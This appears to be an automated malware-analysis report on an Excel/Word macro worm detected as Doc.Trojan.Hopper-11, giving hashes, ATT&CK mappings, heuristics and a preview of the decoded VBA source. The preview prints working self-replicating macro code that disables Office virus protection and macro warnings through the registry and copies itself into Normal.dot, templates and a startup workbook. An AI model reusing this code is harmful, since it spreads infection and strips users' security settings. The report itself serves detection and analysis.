Doc.Trojan.Hopper-11 Office (OLE) malware analysis — malicious · 5c1ce3da84dd952c

MALICIOUS

Office (OLE)

56.5 KB Created: 2000-08-08 05:48:02 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: e5a59dc94dcaf2fc121fcbe699bc8219 SHA-1: 0d97eb4ceb0c2023b55001498598dfdcf5bb4e8e SHA-256: 5c1ce3da84dd952cac253ba4c3a33db5f4aa546e000fc0b594c3faf0b7ac9ede

300 Risk Score

Malware Insights

Doc.Trojan.Hopper-11 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1546.001 Event Triggered Execution: Event Triggered Execution T1546.001 Event Triggered Execution: Event Triggered Execution T1546.001 Event Triggered Execution: Event Triggered Execution T1546.001 Event Triggered Execution: Event Triggered Execution T1546.001 Event Triggered Execution: Event Triggered Execution

The sample contains VBA macros, including an AutoOpen subroutine, which is a common technique for malicious Office documents. The script attempts to disable virus protection for Word and Excel and modifies registry keys to disable macro security warnings. It also includes functionality to save the current file and infect other Office documents, indicating a worm-like behavior.

Heuristics 6

ClamAV: Doc.Trojan.Hopper-11 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Hopper-11
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5682 bytes
SHA-256: `09756858c775bde368bd8d91fea97746c3e17fcd32c3b752e34074fa35d948b6`
Detection ClamAV: Doc.Trojan.Hopper-11 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True '<!--BEAT,V1.0--> '2000-4 Private Sub autoexec() SaveAsMyFile "A:", Application.Path InfectWordAndExcel End Sub Private Sub autoopen() SaveAsMyFile "A:", Application.Path InfectWordAndExcel End Sub Private Sub Document_Close() SaveAsMyFile "A:", Application.Path InfectWordAndExcel End Sub Private Sub Workbook_Deactivate() InfectWordAndExcel End Sub Private Sub InfectWordAndExcel() On Error Resume Next Set WordObj = GetObject(, "Word.Application") If WordObj = "" Then Set WordObj = CreateObject("Word.Application") WQuit = True End If Set xlApp = GetObject(, "Excel.Application") If xlApp = "" Then Set xlApp = CreateObject("Excel.Application") EQuit = True End If ''=============================================== '''word'VirusProtection Set WdappOp = WordObj.Options With WdappOp .VirusProtection = False .ConfirmConversions = False .SaveNormalPrompt = False End With '' '''excel'VirusProtection System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "0" ' = "Check" System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = "0" '= "" System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "0" ' = "Whoa" ''========================== Set nt = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule Set TT = WordObj.Templates(1).VBProject.VBComponents(1).CodeModule Set ad = WordObj.ActiveDocument.VBProject.VBComponents(1).CodeModule '' DoWordtoItself If Application.Name = "Microsoft Word" Then If ad.Lines(1, 1) <> "'<!--BEAT,V1.0-->" Then ad.DeleteLines 1, ad.CountOfLines ad.InsertLines 1, TT.Lines(1, TT.CountOfLines) If ad.Lines(1, 1) <> "'<!--BEAT,V1.0-->" Then ad.InsertLines 1, nt.Lines(1, nt.CountOfLines) End If End If If nt.Lines(1, 1) <> "'<!--BEAT,V1.0-->" Then nt.DeleteLines 1, nt.CountOfLines nt.InsertLines 1, ad.Lines(1, ad.CountOfLines) End If '------------------- If TT.Lines(1, 1) <> "'<!--BEAT,V1.0-->" Then TT.DeleteLines 1, TT.CountOfLines TT.InsertLines 1, nt.Lines(1, nt.CountOfLines) End If ActiveDocument.Save '' DoWordtoExcel '----------- If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) = UCase("BOOK1") Then ''转成大写的字符串 Kill xlApp.Application.StartupPath + "\Book1." End If '------------ Set Book1Obj = xlApp.Workbooks.Add Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, nt.Lines(1, nt.CountOfLines) Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1." Book1Obj.Close End If ''====Word ''=================================================== '''Workbook_Deactivate If Application.Name = "Microsoft Excel 8.0 中文版" Then Set AW = xlApp.ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule Set TW = xlApp.ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule If AW.Lines(1, 1) <> "'<!--BEAT,V1.0-->" Then AW.DeleteLines 1, AW.CountOfLines AW.InsertLines 1, TW.Lines(1, TW.CountOfLines) End If If TW.Lines(1, 1) <> "'<!--BEAT,V1.0-->" Then TW.DeleteLines 1, TW.CountOfLines TW.InsertLines 1, AW.Lines(1, TW.CountOfLines) End If '-------------- If nt.Lines(1, 1) <> "'<!--BEAT,V1.0-->" Then nt.DeleteLines 1, nt.CountOfLines nt.InsertLines 1, TW.Lines(1, TW.CountOfLines) End If ActiveWorkbook.Save E ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.